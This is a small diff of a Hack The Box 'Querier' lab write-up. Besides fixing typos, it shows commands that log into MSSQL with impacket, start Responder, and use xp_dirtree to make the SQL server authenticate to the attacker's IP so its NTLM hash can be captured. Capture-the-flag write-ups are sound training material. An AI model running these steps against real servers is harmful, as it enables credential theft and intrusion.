Kyuu-Ji/htb-write-up/querier/write-up-querier.md

 ./mssqlclient.py reporting@10.10.10.125 -windows-auth
 ```

 After putting in the password we get in and can execute commands that impacket provides us.
-The command `enable_xp_cmdshell` is to start a shell but it fails because the user has no permission to do this, that's why we are going to extract his NTLM hash with **Repsonder**:
+The command `enable_xp_cmdshell` is to start a shell but it fails because the user has no permission to do this, that's why we are going to extract his NTLM hash with **Responder**:
 ```markdown
 responder -I tun0
 ```

-Now on the SQL Server we need to send any authentication to our local machine:
+Now on the SQL Server we need to requests any authentication to our local machine:
 ```markdown
 xp_dirtree "\\10.10.14.13\Test\"
 ```